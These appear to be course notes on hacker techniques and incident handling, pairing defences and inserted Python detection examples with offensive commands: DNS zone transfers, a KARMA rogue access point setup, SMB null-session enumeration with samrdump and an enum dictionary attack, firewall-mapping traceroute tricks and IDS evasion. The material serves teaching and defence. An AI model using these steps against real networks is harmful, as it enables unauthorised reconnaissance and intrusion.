wikihead.files.wordpress.com  · Web viewNetwork Management Personnnel as we get lot of info from...


Hacker Techniques, Exploits & Incident Handling
Notes written by Uma Mahesh Padisetty

Always have Handwritten Notes

o Whom you met, what you asked, what commands you ran.

✔ Maybe carry an audio recorder with you.

o Sometimes video recordings can have policy obligations.

✔ When you do the job, make sure management understands your value in the form of an incident handling summary, i.e., a slide of all incidents, with graphs. For a quiet month include info from other sources such as SANS to avoid budget cuts.

✔ We need to have the appropriate people on the team; it should have core experts in all disciplines:

o Two from Unix, two from Windows

o Network management personnel, as we get a lot of info from routers and switches

o In-house legal counsel

o Sometimes we need HR for taking action on people

o Disaster Recovery/BCP should not be the head of incident handling.

✔ Have a system build checklist, i.e., what are the basic system build documents for those servers, etc.

✔ In order to run the bridge calls, we need to have a list of contact info for all key personnel for emergency calls.

✔ Test your stuff periodically (not regularly.. they hate you).

Source of real-world incident scenarios: www.counterhack.net

CounterHack PPT: http://www.cs.sjsu.edu/~stamp/CS286/ppt/

✔ Incident handlers sometimes need access to devices with admin privileges

o Bargain with Operations Team.

✔ Provide a way for users to contact the incident handling team

o Provide a hotline number, an email address, occasional alert mails.


o We need a special climate-controlled room (say a SOC)

✔ Always plan for backups of evidence

✔ Helpdesks are important; they are the eyes of the incident handling team

o Educate helpdesk people to report specific incidents to us.

✔ Incident Response Kit – set of tools

o Have a jump bag of hard disks to take backups.

o Binary backup software – dd and WinDD

o Netcat – move filesystem images across the network, take the output of certain commands

o Forensic software

Freeware - Sleuthkit, Autopsy

Commercial tools – Guidance Software EnCase

o Diagnosis software (sometimes a rootkit installed on the machine might lie to you regarding the bad guy, as the rootkit modifies the operating system itself. So carry your trustworthy set of tools on a CD or pen drive for diagnosis)

A good bootable Linux disk (e.g., Helix)

o Use something like taps to capture. Can't use hubs, switches

Cannot use on servers

The bad guy can identify it as it is bidirectional

Available from NetOptics (a USB-powered TAP is easy to use)

o Cables (1 straight-through, 1 crossover cable, 1 USB-to-serial cable, 1 serial cable for routers, an extra hard drive cable)

o Laptop with multiple operating systems (at least virtual machines)

✔ Interview the operations people with open-ended questions like:

what recent changes were made to the firewall?

what recent configurations?

what patches?

any scripts executed?


✔ Involve your peers in handling the incident, and everyone maintains notes. Also involve the necessary people such as the administrator, business manager, risk manager, client POC, etc.

✔ Network Perimeter Detection

tcpdump -n

✔ Host Perimeter Detection

Firewall Logs

netstat -an

Virus Response Tool Kit (LiveIR)

✔ System administrator cheat sheets (for Windows and Linux) list the commands a system administrator uses to find anomalies.

Session 2


sc – service controller; services.msc, msconfig, net view, etc.

at – to check what jobs are scheduled; Process Explorer from Sysinternals

Netcat – To transfer data across TCP and UDP Ports

We have to create a chain of evidence (a collection of events) on a document. E.g., when a law enforcement officer asks for a hard drive, ask for proof (mail, fax) and then send a copy of the real one.

Preparation

Identification


Containment:

o Short-term containment: pause the attacker temporarily without changing the configurations made by the attacker, i.e., blocking the network, the port, isolating the machine.

Maintain a good relationship with the management sponsor who will provide resources and remove blocks. The management sponsor can be the LIRM or SDM – notify him.

Coordinate with network personnel to isolate the machine from the network. It can be done by pulling the LAN cable from the machine, or blocking the switch port attached to the machine.

Usually bad guys hit an IP address. Change the IP in the DNS servers so that your customers come to your actual service while the bad guy tries to hit the old machine. It helps until we get some information. The problem is convincing management.

Maintain a low profile while investigating. Do not do reconnaissance from the infected machine. If needed, do it from another machine (lab).

Back up the machine (create images – use dd, WinDD etc. from a live CD).
How do you deal with filesystems of terabytes of data???
Usually such devices have RAID mirroring, so there is a button to synchronize the mirror. Here you go: push the button and take it.
Use built-in backup software.
Copy only the system partition where the OS resides, and the logs.

Use some tool for logging the incidents and providing an incident number. E.g.:
RTIR (Real Time Incident Response) - http://bestpractical.com/rtir/
BlackThorn - http://www.qccis.com/blackthorn

o Long-term containment and eradication:

remove/disable accounts

shutdown/remove backdoor

change passwords

Eradication

Recovery

Lessons Learnt

<<checkout the slides>>


Ask open-ended questions. Do not ask yes/no questions.

Espionage: espionage or spying involves an individual obtaining information that is considered secret or confidential without the permission of the holder of the information.
Tip#1: When handling such cases, use trusted people.
Tip#2: Try target analysis of our own organization.
Tip#3: To generate an event while transferring critical documents, assign a unique serial number in them so that Google can bring it up; use some signature so the IDS can identify the transfer.
Tip#4: Always have access to various logs, not just device logs but physical logs such as datacenter entry login/logout, call records of some person, surveillance videos, etc.

Unauthorized use:
Tip#1: Organizational reconnaissance.

Phone phishing: the email states that your account has a problem, please call the number to fix it. The number goes to VoIP and a phishing IVRS of the bank asking you to input your account number and PIN for authentication.

Inappropriate web access: pull the proxy logs (but do it only if HR asks in writing, not because the manager asks). Bluecoat, SurfControl etc. can block unwanted sites categorized as pornography, malware sources, etc.

Insider threat: it could be a contractor, business partner, or employee. It can be destructive or non-destructive (=> doesn't mean not damaging; they copy and take it out). They might plant logic bombs. A warning banner helps prevent insider threat. Always get authorization from HR when monitoring a suspicious person, otherwise they might sue you. Ask open-ended questions…

Intellectual property theft:
Patents: protect innovations
Copyrights: protect specific expressions of ideas, content
Trademarks: protect brands

Confusion attack: using the same fonts, colors to confuse between original and duplicate, e.g., Microsoft and Microsaft.
Trade secret protection: things we derive economic value from by their being secret. Provides various penalties for violation. Protecting against theft.

How to identify a breach of intellectual property? To prove the theft and intellectual property violation, we need to show that we gave it enough protection.


Law, Crime and Evidence
Three domains:

US Federal Law: Title 10 Section 2030: Computer Fraud and Abuse Act
1) Computers working for the government
2) Computers associated with infrastructure
3) Computers associated with e-commerce
The laws apply only if damage > $5000

DAY 2

Session 1
Talks about vulnerabilities, disclosures and complications

Whenever a vulnerability is found it is advised to contact the vendor and go public when they patch, or after a timeframe of 90 days (mostly) or even 180 days before going public. If the vulnerability was found via reverse engineering, you could be sued under the DMCA.

TippingPoint will buy the vulnerabilities.

Send the vulnerability via a proxy like US-CERT or SANS ISC.

Hacktivism: hacking to make a political point.
Create malware -> create a botnet -> rent the botnet (e.g., for hacktivism)

Scareware, codecs – drive-by downloads

How does a hacker start attacking?

Reconnaissance


Whois – one can get the contact information of the domain. Find out the registrar associated with the domain; the registrar would provide details. Sometimes the IP can be a block of IPs; it can be the ISP. http://yehg.net/lab/pr0js/misc/wsa.php
Sometimes when the contact is a person, then social engineering can be played on him for reconnaissance.
P.S.: There are some anonymous registrars who will not put up the owner's information. This will slow down the contacting process.
DNS interrogation - bad guys always want to have as many records as possible.
Zone transfers – the hacker's way to get the most out of DNS. It is used to transfer DNS records from the primary NS to the secondary NS. However, hackers exploit it to collect the DNS records. There are Perl scripts (found on BT) for DNS enumeration. dig can be used for a zone transfer:

Get the name server:
#dig counterhack.com
<<provides the name server of counterhack.com>>

Ask the name server about the domain using protocol AXFR (or IXFR):
#dig @ns1.highland-parking.net counterhack.com axfr
[As a security feature, most name servers might have disabled it]

nslookup on Windows serves the same purpose. Usually an organization keeps secondary and tertiary NS with the ISP, and those may support zone transfer. Send a mail to the ISP to block it.

DNS is highly critical infrastructure; always harden it.

Identification of DNS compromise: look for zone transfers - normal DNS uses UDP 53 while zone transfers use TCP 53. Also look for DNS responses bigger than 512 bytes. Also a DNS request bigger than 512 bytes can be a buffer overflow attack.
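The identification rules above turned into detection logic, as an added example (not from the notes or any course material): it parses a constructed key=value DNS flow log and flags unapproved zone transfers, non-transfer DNS over TCP, and messages over 512 bytes. The log format, the ALLOWED_SECONDARIES set and all addresses are assumptions made for the illustration.

```python
"""Flag the DNS patterns the notes call out: zone transfers (TCP/53, AXFR/IXFR)
from hosts that are not our secondaries, responses over 512 bytes, and requests
over 512 bytes. The flow-log format and every address below are constructed
for this illustration; they are not from any real capture."""
import re
from dataclasses import dataclass

# Constructed: the secondaries that are entitled to pull the zone.
ALLOWED_SECONDARIES = {"192.0.2.10"}
CLASSIC_DNS_LIMIT = 512  # the pre-EDNS0 UDP message limit the notes refer to


@dataclass
class DnsFlow:
    ts: str
    proto: str      # "udp" or "tcp"
    src: str
    dst: str
    dport: int
    direction: str  # "query" or "response"
    qtype: str      # A, TXT, AXFR, ...
    size: int       # DNS message bytes


FIELD = re.compile(r"(\w+)=(\S+)")


def parse_flow(line):
    """Parse one 'key=value ...' log line into a DnsFlow."""
    f = dict(FIELD.findall(line))
    return DnsFlow(f["ts"], f["proto"].lower(), f["src"], f["dst"], int(f["dport"]),
                   f["dir"].lower(), f["qtype"].upper(), int(f["bytes"]))


def classify(flow):
    """Return the reasons a flow is suspicious; an empty list means it looks normal."""
    reasons = []
    is_transfer = flow.qtype in ("AXFR", "IXFR")
    if is_transfer and flow.src not in ALLOWED_SECONDARIES:
        reasons.append("zone transfer from unapproved host")
    elif flow.proto == "tcp" and not is_transfer:
        # Notes: normal lookups use UDP/53; TCP/53 is what zone transfers use.
        reasons.append("DNS over TCP that is not a zone transfer")
    if flow.direction == "response" and flow.size > CLASSIC_DNS_LIMIT:
        reasons.append("response larger than 512 bytes")
    if flow.direction == "query" and flow.size > CLASSIC_DNS_LIMIT:
        reasons.append("query larger than 512 bytes (possible overflow attempt)")
    return reasons


def scan_log(text):
    """Run classify() over every line; returns (ts, src, reason) tuples in log order."""
    alerts = []
    for line in text.splitlines():
        if line.strip():
            flow = parse_flow(line)
            alerts.extend((flow.ts, flow.src, r) for r in classify(flow))
    return alerts


# Constructed sample log: one ordinary lookup pair, one approved transfer, then
# four lines that should each trip one of the rules above.
SAMPLE_LOG = """\
ts=10:00:01 proto=udp src=10.1.1.20 dst=10.1.1.53 dport=53 dir=query qtype=A bytes=64
ts=10:00:01 proto=udp src=10.1.1.53 dst=10.1.1.20 dport=40001 dir=response qtype=A bytes=96
ts=10:00:05 proto=tcp src=192.0.2.10 dst=10.1.1.53 dport=53 dir=query qtype=AXFR bytes=58
ts=10:00:07 proto=tcp src=198.51.100.7 dst=10.1.1.53 dport=53 dir=query qtype=AXFR bytes=58
ts=10:00:09 proto=udp src=198.51.100.7 dst=10.1.1.53 dport=53 dir=query qtype=TXT bytes=1400
ts=10:00:10 proto=udp src=10.1.1.53 dst=10.1.1.20 dport=40002 dir=response qtype=ANY bytes=3000
ts=10:00:11 proto=tcp src=203.0.113.5 dst=10.1.1.53 dport=53 dir=query qtype=A bytes=70
"""

if __name__ == "__main__":
    for ts, src, reason in scan_log(SAMPLE_LOG):
        print(f"{ts} {src:15} {reason}")
```

Tuning caveat: resolvers that use EDNS0 routinely exceed 512 bytes over UDP, and TCP/53 is also the legitimate fallback for truncated responses, so baseline these rules against your own servers before alerting on them.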

Website searches: press releases, job openings, business partners, phishing attacks on employees


Defences:

Preparation: look at your own websites,

See what your employees talk about in newsgroups
Make job opening descriptions generic

Identify web crawler activity from the logs

Google searches: Johnny Long – Using Google for Penetration Testing

phonebook: James Smith – Google provides phone book search (US directory only)

site: isc.sans.com – search only within this site

link: wikihead.wordpress.com – shows everything that links to that site

intitle: Honeypot Indepth – searches the keywords in the title. Sometimes the files on the server are listed with the title Index, hence “site:domain.com intitle:index”

inurl: robots.txt – searches the term in the URLs. Helps identifying critical files such as the robots.txt shown here

wikihead –malware – discards the term malware from the search (minus)

+ – e.g., ‘X and Y’ strips out “and”, so use X+and+Y

X.Y – the dot matches one character

Google Cache: contains the website image from Google's servers. Helps to view deleted contents on the site.
P.S.: Data in the Google cache can be removed by using Google Webmaster Tools.

Language translation: http://translate.google.com

Browse the website using Google Translator. You can browse anonymously… (not ultimately anonymous)

filetype: pdf – reports only PDF files with the given search terms

ext: rdp – shows RDP files (remote desktop files)


GHDB – Google Hacking Database
robots.txt – it lists the files or folders that should not be crawled.
[Honeypot use: check the IP that accessed a file mentioned in robots.txt… it is a malicious bot]
noindex, noarchive, nosnippet etc. written to robots.txt can prohibit Google Bot from capturing unwanted info on the server.
User Agent Switcher: a Firefox plugin to change the User-Agent of web requests.

Google URL crawl request form: Google crawls the site from scratch again from the root.

SamSpade – a simple tool for whois, DNS, tracert etc. for reconnaissance. It has a web crawler.
wget -r [web crawling for local mirroring]

SCANNING

War dialing: phone sweep: dial the numbers in sequence.
Nudge string: replay a pattern of signal when a modem is found (modem-style attack).
Remediation: use a modem only if the vendor has a strong requirement; even if used, ask for strong user IDs and passwords. Conduct a war dialing exercise.

[There are voice IPSs which detect war dialing and block the calls to the modem if vulnerable.] As an IR member, you should have contact with a person who can tell you where the phone line ends inside the company.

NetStumbler: a good war-driving tool for wireless access points. If WEP is used, capturing some packets can crack the keys.

Aircrack-ng: a superb one to crack WEP keys.

SESSION 2


KARMA - http://www.wirelessdefence.org/Contents/KARMAMain.htm
KARMA is a set of tools for assessing the security of wireless clients at multiple layers.

1. It sniffs the 802.11 probe request packets passively and thereby discovers clients.
2. From the packets, it extracts what network the clients want to connect to (I guess it would be the SSID).
3. KARMA includes patches for the Linux MADWifi driver to allow the creation of an 802.11 access point that responds to any probed SSID.
4. It starts the services ACCESS-POINT, DNS-SERVER, DHCP-SERVER, FTP-SERVER.
5. When the user wants to connect to the internet via the SSID, KARMA acts as MITM, assigns a DHCP IP to the victim and captures all the traffic. It acts as a fake DNS, FTP server to capture credentials and returns nothing.

karma-lan.xml - "This configuration runs rogue DHCP, DNS and HTTP services on an existing (wired) network connection. The HTTP service redirects all requests to the ExampleWebExploit module that displays a simple HTML page"
Usage:
cd /tools/wifi/karma-20060124
bin/monitor-mode.sh ath0
bin/karma etc/karma-lan.xml


ASLEAP – Exploits Cisco LEAP Protocol http://www.wirelessdefence.org/Contents/AsleapMain.htm

The Lightweight Extensible Authentication Protocol (LEAP) is a proprietary wireless LAN authentication method developed by Cisco Systems. Important features of LEAP are dynamic WEP keys and mutual authentication (between a wireless client and a RADIUS server). LEAP allows for clients to reauthenticate frequently; upon each successful authentication, the clients acquire a new WEP key (with the hope that the WEP keys don't live long enough to be cracked). LEAP may be configured to use TKIP instead of dynamic WEP.

The password itself is not encrypted and transferred while authenticating; instead some complicated hash ..blah.. blah..blah… is transmitted over the air for authentication. There is a weakness which is exploited by running a dictionary attack against those transmitted hashes to retrieve WEAK PASSWORDS.

A simple defense strategy employed is MAC filtering at the AP… Oh… MAC is spoofable.. Just sniff the MAC from packets and use it when the machine is offline.

WPA2 is a stronger access authentication mechanism

Attacking aggressive mode IKE, which is used for wireless VPN connections, is easy: it is crackable. It takes shortcuts to improve performance by avoiding rekeying.
IKE Aggressive Mode: in IKE aggressive mode the authentication hash based on a pre-shared key (PSK) is transmitted as the response to the initial packet of a VPN client who wishes to establish an IPsec tunnel. This hash is not encrypted. A packet sniffer (e.g., tcpdump) can be used to capture these hashes and a dictionary or brute force attack can be used against the hash to recover the PSK.

This attack only works in IKE aggressive mode because in IKE main mode the hash is already encrypted. Based on this fact, we can learn that IKE aggressive mode is not very secure.
Tool: IKECrack - http://ikecrack.sourceforge.net/
Hence the tip is: disable aggressive IKE.
Proof of concept: http://www.ernw.de/download/pskattack.pdf

Cisco APs have an integrated security mechanism and can also assist by jamming the rogue machine. But it is problematic as it can jam any machines in the vicinity that belong to another company. Mostly jamming is legally banned and will not be used. I believe the other guy can sue you.


There are some WIPS such as AirMagnet, AirDefense

WIRELESS LAN Security Policies

WEP shouldn't be used
Disable aggressive IKE
When jammers are used, put up a sign board notifying the same

<<Working with NETSTUMBLER>>

Is wardriving with NetStumbler legal?
Ans: It depends….. since it sends BEACONs and receives responses. Hence it is advised to disable DHCP. Passive sniffing is legally wrong as it might violate their privacy.

TIME: 30 MINS complete

Network mapping: we need to get the topology.
Cheops-NG: http://www.digipedia.pl/man/doc/view/cheops-ng.1/

It is a simple tool that provides network mapping by using host discovery and also port discovery on the machines. It uses ping and traceroute for network mapping: sending a traceroute packet with TTL = 1, I get the first-hop machine; sending a traceroute packet with TTL = 2, we get the second-hop machine.
Features:

Host discovery - uses ICMP ping packets
Machine fingerprinting to determine OS (using Nmap) - runs an nmap command to do the OS fingerprinting
Use of DNS and ICMP to detect network hosts
Network mapping - mapping is done using UDP (or optionally ICMP) packets with small time-to-live values (traceroute and mtr, respectively)

Usage:

1. First start the Cheops agent on the machine: #cheops-agent &
2. Connect to the Cheops agent: #cheops-ng

3. Enter the IP of the machine on which cheops-agent is running.. currently it is localhost
4. Add a host in the workspace.. just one target machine

Recommendations

✔ Usually corp blocks pings.
✔ Also block outgoing ICMP packets

>>>Simple details on TCP, UDP headers<<<
Port scanner – Nmap
http://www.insecure.org/presentations/Shmoo06/
(nmap on Windows is not reliable due to the non-robust TCP/IP stack in Windows)

Break: 1:35 Hrs

Defenses

● Disable all ports until there is a business need
● Periodically check the rule base for its need.

Tools:


Windows:

netstat -a,

netstat -ab --- lists all details of the DLLs and processes that are connected

TCPView

WMIC (Windows Management Instrumentation Control)

Linux:

lsof (list open files)
lsof -i -- shows open connections
lsof -- lists all the open files of all applications
kill – kills the process
chkconfig – used to manage which services load in each of the runlevels

chkconfig --list [name]
chkconfig --add name
chkconfig --del name
chkconfig [--level levels] name <on|off|reset>
Eg: chkconfig --add xinetd
chkconfig --level 5 xinetd off

Exercise

Do a TCP scan, decoys, SYN stealth scan, connect scan.
To check outgoing packets – tcpdump -lio
Version scanning
Why not a connect scan with a decoy scan?

Passive Fingerprinting

p0f2

NetworkMiner - http://networkminer.sourceforge.net/
It can also pull out files transferred from the dump files, and clear-text contents in the dumps. Very nice tool.

Determining Firewall Rules

✔ Using ICMP instead of UDP for traceroute can reveal info about the devices behind the firewall, as ICMP may not be blocked by the firewall: #traceroute -I 10.9.23.1

✔ UDP port 53 is usually unblocked at the firewall since it is needed for DNS queries/responses. Hence we need to fool the firewall. Normal traceroute increases the source port monotonically with each hop, and three packets are delivered to each hop. So in order to send a packet that has port 53 at the firewall, we have to set the initial port number as TargetPort – (number_of_hops * number_of_probes) – 1, i.e., 53 – (8 * 3) – 1 = 23 [suppose the number of hops before reaching the gateway is 8]
#traceroute -p28 10.9.23.1
This will only give info about the device just after the gateway.. :(
Instead, stop the incrementation:

#traceroute -S -p53 20.9.23.1

Layer Four Traceroute (lft)

It determines what packets are allowed through the firewall.

Firewalk - http://packetstormsecurity.org/UNIX/audit/firewalk/firewalk-0.99.1.tar.gz

It employs traceroute-like techniques to analyze IP packet responses to determine gateway ACL filters and map networks. Firewalk the tool employs the technique to determine the filter rules in place on a packet forwarding device. In order to use a gateway’s response to gather information, we must know two pieces of information:

• The IP address of the last known gateway before the firewalling takes place

• The IP address of a host located behind the firewall.


Using proxy servers can eliminate firewalking. Some NIDS also detect firewalking.
2:28 PM – Vulnerability scanning

These vulnerability scanners detect only known vulnerabilities and do not identify zero-day vulns. Hence it is always advised to have multiple layers of security. As an exercise, just take the topology of the DMZ and assume that one machine is compromised by a zero-day vulnerability. Then think of the solution.

Nessus

They generate huge reports, which are hard to understand. It also does not do correlation or cross-correlation.

Nessus has plugins, where each plugin performs one test on the target environment

NASL (Nessus Attack Scripting Language) – is used to create plugins

Architecture:

The Nessus client communicates with the Nessus daemon server, telling it to do the scan.

NessJ – a Java-based Nessus client that presents results in an understandable format

Dangerous plugins – can cause damage to the end system (like DoS-based plugins for checking vulns)

1. Install Nessus
2. Create a certificate
#nessus-mkcert
3. Add a user
#nessus-adduser
4. Start the Nessus server daemon
#nessusd -D
5. Start the Nessus client
#nessus
6. The Nessus GUI is displayed; log in and start the scan
7. It is advised to run updates periodically
#nessus-update-plugins

WebApp Scanner

They know about known CGI vulnerabilities, Active Server Pages vulnerabilities, etc. E.g., AWStats vulnerabilities, phpBB vulnerabilities

Nikto web app scanner – a free tool written in Perl.

It looks for CGI files for vulnerabilities
It looks into robots.txt
It has a port scanner
It has application-level IDS evasion
Supports web authentication
Supports SSL; it has mutation functionality

Wikto – a similar tool with a GUI that includes Google Hacking DB support.

IDS Evasion

Packet fragmentation – the technique is used to evade detection

In the IP header,

DF bit – Don't Fragment
MF bit – more fragments are coming
Fragment offset – used for reassembly
IP ID value is used to assemble the fragments
However, wireline IDS detect these attacks using virtual packet reassembly buffers.
Unfortunately, wireless IDS do not detect fragmented packets, and they can easily pass through.


Sending small packet fragments (session splicing)
Pause sending fragments so that the IDS times out but not the host machine
Overlapping fragments - for example, the first packet will include 80 bytes of payload but the second packet's sequence number will be 76 bytes after the start of the first packet. When the target computer reassembles the TCP stream, it must decide how to handle the four overlapping bytes. Some operating systems will take the older data, and some will take the newer data.
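The overlap case in the notes, worked through as an added example (not from the notes): a small reassembler that applies either policy to the 80-byte / 76-offset segments, plus the check an IDS needs, which is to report the offsets where two segments disagree instead of guessing the target's policy. The payload bytes and the policy names "first"/"last" are constructed for the illustration.

```python
"""Reassemble overlapping TCP segments under the two policies the notes describe
(keep the older data vs. keep the newer data) and report the bytes that differ.
Added illustration; segment payloads are constructed and the policy names are mine."""


def reassemble(segments, policy):
    """segments: list of (seq, payload) in arrival order.
    policy "first": a byte already received wins (older data kept);
    policy "last": a later segment overwrites (newer data kept).
    Returns the contiguous stream from the lowest seq, or None if there is a gap."""
    if policy not in ("first", "last"):
        raise ValueError("policy must be 'first' or 'last'")
    stream = {}
    for seq, payload in segments:
        for i, byte in enumerate(payload):
            off = seq + i
            if policy == "last" or off not in stream:
                stream[off] = byte
    if not stream:
        return b""
    lo, hi = min(stream), max(stream)
    if len(stream) != hi - lo + 1:
        return None  # hole: a segment is still missing, nothing to hand up yet
    return bytes(stream[o] for o in range(lo, hi + 1))


def conflicting_offsets(segments):
    """Offsets covered by more than one segment with different data.
    An IDS that cannot know the target's policy should alert on a non-empty
    result rather than pick one interpretation and miss the other."""
    seen = {}
    conflicts = set()
    for seq, payload in segments:
        for i, byte in enumerate(payload):
            off = seq + i
            if off in seen and seen[off] != byte:
                conflicts.add(off)
            seen.setdefault(off, byte)
    return sorted(conflicts)


# Constructed to match the notes' example: an 80-byte first segment, then a
# second segment starting 76 bytes in, so bytes 76..79 arrive twice with
# different content.
FIRST = (0, b"A" * 76 + b"1234")
SECOND = (76, b"abcd" + b"B" * 20)

if __name__ == "__main__":
    segs = [FIRST, SECOND]
    print("conflicting offsets:", conflicting_offsets(segs))
    for policy in ("first", "last"):
        print(policy, "policy keeps", reassemble(segs, policy)[76:80])
```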

FragRouter
Some IDS give you the option to block fragmented packets, although it is not recommended. Check before blocking.

• Runs on Unix/Linux systems

• Provides over 35 different schemes for fragmenting the flow of data

• Separates the attack functionality from the fragmentation functionality

Some fragmentation types:

• Sends data in ordered 8-byte fragments

• Sends data in ordered 24-byte fragments

• Sends data in ordered 8-byte fragments with one fragment out of order

• Complete TCP handshake, send fake FIN and RST (with bad checksums) before sending data in ordered 1-byte fragments

Obfuscating the attack payload
Send the data such that the IDS cannot understand it but the victim machine can, viz., using Unicode encoding, attacking via HTTPS (usually backdoors planted by an attacker work under HTTPS)

Inserting Traffic at the IDS


Send the traffic such that the IDS sees it and determines state for a machine, but the packet actually doesn't reach the end machine, i.e., by sending a RST packet with a low TTL value so that it expires after reaching the IDS. Also by sending a packet with a bad checksum so that the end machine will discard it.

Gaining Windows Data through Null Sessions [Enumeration]

The most powerful account on the machine – SYSTEM [not Administrator]
A null session is an anonymous request that comes in saying: I am nobody, coming from nowhere, please give me some data.
With a null session hackers can call APIs and use remote procedure calls to enumerate information. These techniques can, and will, provide information on passwords, groups, services, users and even active processes. Null session access can also be used for escalating privileges and performing DoS attacks.
Information usually enumerated by intruders:

Network resources and shares
User accounts and groups
Applications

Anyone with a NetBIOS connection to your computer can easily get a full dump of all your usernames, groups, shares, permissions, policies, services and more using the null user --- just check for open ports 139 and 445 on your machine, which are the NetBIOS ports; almost 90% of machines have them open.

Sample Hack using NetBIOS Null Session:


1. Impacket Samrdump - an application that communicates with the Security Account Manager Remote interface from the DCE/RPC suite. It lists system user accounts, available resource shares and other sensitive information exported through this service.

bt smb-enum # samrdump.py guest:''@192.168.1.104 139/SMB
Retrieving endpoint list from 192.168.1.104
Trying protocol 139/SMB...
Found domain(s):
. YOUR-O1N9OY17SK
. Builtin

2. DumpSec – It dumps information about system users, file system, registry, Permissions, Password Policy and services

3. Enum – a simple console-based tool that can be used in scripts
#enum -u --- lists users
#enum -g --- lists groups
#enum -s --- lists shares
#enum -p --- lists the password policy

C:\> enum -D -u <username> -f <dictionary>
dictionary is a file containing a list of passwords, which can be obtained from any password cracking tool
Download link for Windows: http://www.indianz.ch/tools/scan/enum.zip

4. WinFingerprint

Having Established a Session

We can use tools like rpcclient to execute RPC commands on the client machine.

Defense: change the registry entry RestrictAnonymous to 0x02

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA [ Default: 0x01 ]

Drop the packets destined for ports 135-139, 445

Day 3
Spoofing


SniffingMac FloodingArp spoofingSession HijackingDNS PoisoningBuffer OverflowsFormat String Attacks & Exploits

Spoofing

Decoy scans with Nmap are examples of spoofingThey are done to exploit trust relationship, to pass through ACLs, DOS attacks, to avoid logging attacker traces.

1. Change IP Address
2. TCP Guessing
3. Source Routing

On Unix, the source IP can be changed via ifconfig. On Windows, it can be changed via the Network control panel or netsh.

Change IP Address
Tools:
o Nemesis – it presents itself like a TCP/IP stack; you fill in the fields and it crafts the packets.
o Hping2
o Netdude – it can read pcap files and graphically represent the communication. Here we can edit the connection settings etc. and save the capture. Now we are ready for a Replay Attack.

Now the problem is: how do you complete the TCP 3-way handshake with spoofing? The receiver sends the SYN/ACK to the spoofed address, which sends back a RST. So what's the use?

Spoofing is useful for UDP kinds of attacks.

TCP Guessing
Mitnick attack to create a 3-way handshake: prior to launching the attack, sample as many packets as possible from the Admin Server and do statistical analysis to predict the sequence number.

1) Disable Admin
2) Send a spoofed SYN packet
3) Send a spoofed ACK packet with the predicted sequence number
4) From the target machine's perspective, it has established a TCP connection to Admin
5) Now execute a command: "Please add attacker to the .rhosts file"
6) Now the attacker can directly authenticate with the target machine


Source Routing

Defences
1. Make TCP sequence numbers highly random, i.e., always apply the vendor's patch if it relates to the TCP stack.
2. Be careful with trust relationships (rlogin, rsh). It is advised not to extend trust relationships beyond the firewall, since it is recommended to allow trust relationships only between machines having the same level of control, threat and security. Also, with a firewall we can block the intruding attempts.
3. Authentication should not be based on IP address. I.e., if you say "allow only this IP to pass through to the DMZ"... lol, it is spoofable. Hence use some other authentication mechanism like username/password, VPN, etc.
4. Replace remote commands like rlogin, rsh, telnet and ftp with SSH.
5. Some legacy systems might not work with SSH etc. In that case, use another machine one hop prior to the legacy machine: connect to that machine in a secure fashion and then use rlogin/rsh to the legacy system.
6. Anti-spoof filters at firewalls. E.g.: if I see a packet with source IP 20.*.*.* arriving on this interface, drop it.
7. Enable Unicast Reverse-Path Forwarding check on routers. It checks its routing table for the source address and the incoming interface to determine whether the packet is coming from the path that the router itself would use to reach that source.
8. No source routing, no IP directed broadcast at border gateways.

Identification


1. Make sure anti-spoof filters generate a log entry when they detect spoofing. Usually log analyzers such as enVision collect logs from firewalls etc. and show up these alerts.

2. IDS Sensors that look at ip addresses that do not belong here.
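The anti-spoof filter (defence 6), the strict uRPF check (defence 7) and the logging requirement (identification 1) above, worked together as an added example; this is not from the original notes. The routing table, interface names and packets are constructed and hypothetical.

```python
import ipaddress
import logging
from dataclasses import dataclass

# Constructed routing table of a hypothetical border router: prefix -> egress interface.
ROUTES = {
    "10.0.0.0/8": "eth1",       # internal networks sit behind eth1
    "192.0.2.0/24": "eth1",     # DMZ, also on the inside
    "0.0.0.0/0": "eth0",        # default route: the Internet is on eth0
}

# Defence 6: prefixes we own must never arrive from the Internet-facing interface.
INTERNAL_PREFIXES = ["10.0.0.0/8", "192.0.2.0/24"]
EXTERNAL_IFACE = "eth0"


@dataclass
class Packet:
    src: str
    dst: str
    iface: str   # interface the packet arrived on


def best_route_iface(addr):
    """Longest-prefix match: the interface this router would use to reach addr."""
    ip = ipaddress.ip_address(addr)
    best = None
    for prefix, iface in ROUTES.items():
        net = ipaddress.ip_network(prefix)
        if ip in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, iface)
    return best[1] if best else None


def urpf_strict_ok(pkt):
    """Defence 7 (strict uRPF): the source must be reachable via the ingress interface."""
    return best_route_iface(pkt.src) == pkt.iface


def antispoof_ok(pkt):
    """Defence 6: an internal source address arriving on the external interface is spoofed."""
    if pkt.iface != EXTERNAL_IFACE:
        return True
    ip = ipaddress.ip_address(pkt.src)
    return not any(ip in ipaddress.ip_network(p) for p in INTERNAL_PREFIXES)


def filter_packets(packets, log=logging.getLogger("antispoof")):
    """Return (accepted, dropped) and log each drop so a log analyzer can raise the alert."""
    accepted, dropped = [], []
    for pkt in packets:
        if not antispoof_ok(pkt):
            reason = "antispoof: internal source on external interface"
        elif not urpf_strict_ok(pkt):
            reason = "urpf: source not reachable via ingress interface"
        else:
            accepted.append(pkt)
            continue
        log.warning("DROP src=%s dst=%s in=%s reason=%s", pkt.src, pkt.dst, pkt.iface, reason)
        dropped.append((pkt, reason))
    return accepted, dropped


# Constructed sample traffic (documentation-range addresses, nothing real).
SAMPLE_PACKETS = [
    Packet("10.1.2.3", "198.51.100.7", "eth1"),    # internal host going out: accepted
    Packet("10.1.2.3", "10.5.5.5", "eth0"),        # internal source from the Internet: spoofed
    Packet("203.0.113.9", "192.0.2.10", "eth0"),   # genuine Internet client reaching the DMZ
    Packet("203.0.113.9", "10.1.2.3", "eth1"),     # Internet source appearing on the inside
]

if __name__ == "__main__":
    logging.basicConfig(level=logging.WARNING, format="%(name)s %(message)s")
    ok, bad = filter_packets(SAMPLE_PACKETS)
    print(len(ok), "accepted,", len(bad), "dropped")
```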

Containment
1. Identify the machine and remediate.

NetCat - http://h.ackack.net/cheat-sheets/netcat

It reads and writes data across network connections, using the TCP or UDP protocol.

1. Netcat client mode -- it initiates connections
2. Netcat server (listen) mode -- it listens on a TCP/UDP port

Command Options and Descriptions

nc -l        Listen mode
nc           Client mode
nc -L        Listen persistently
